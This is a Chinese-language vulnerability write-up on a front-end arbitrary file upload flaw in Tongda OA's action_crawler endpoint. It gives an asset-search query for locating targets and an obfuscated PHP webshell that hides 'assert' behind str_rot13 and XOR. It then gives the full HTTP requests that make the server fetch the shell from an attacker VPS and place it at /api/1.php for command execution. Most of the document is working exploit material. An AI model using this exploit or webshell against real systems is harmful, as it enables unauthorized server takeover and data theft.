通达OA action_crawler存在前台任意文件上传漏洞
一、漏洞简介
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA action_crawler存在前台任意文件上传漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限。
二、影响版本
- 通达OA 2016-通达OA V11.6
三、资产测绘
- hunter
app.name="通达 OA"
- 特征
四、漏洞复现
- 将webshell
2.php
上传到vps中
<?php class Gisip4hi{/*FVzil1*/function __construct($x){$c=str_rot13('ffreg');/*FVzil1*/$a= ("!"^"@").$c;/*FVzil1*/$a($x);}}new Gisip4hi($_REQUEST['x']); ?>
- 使用python3启用http服务
python3 -m http.server 9000
- 上传文件
POST /module/ueditor/php/action_crawler.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Content-Length: 197
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
CONFIG[catcherPathFormat]=/api/1&CONFIG[catcherMaxSize]=100000&CONFIG[catcherAllowFiles][]=.php&CONFIG[catcherAllowFiles][]=.ico&CONFIG[catcherFieldName]=file&file[]=http://vpsip/2.php
- 上传文件位置
GET /api/1.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2
nuclei脚本
通达OA-action-crawler-任意文件上传.yaml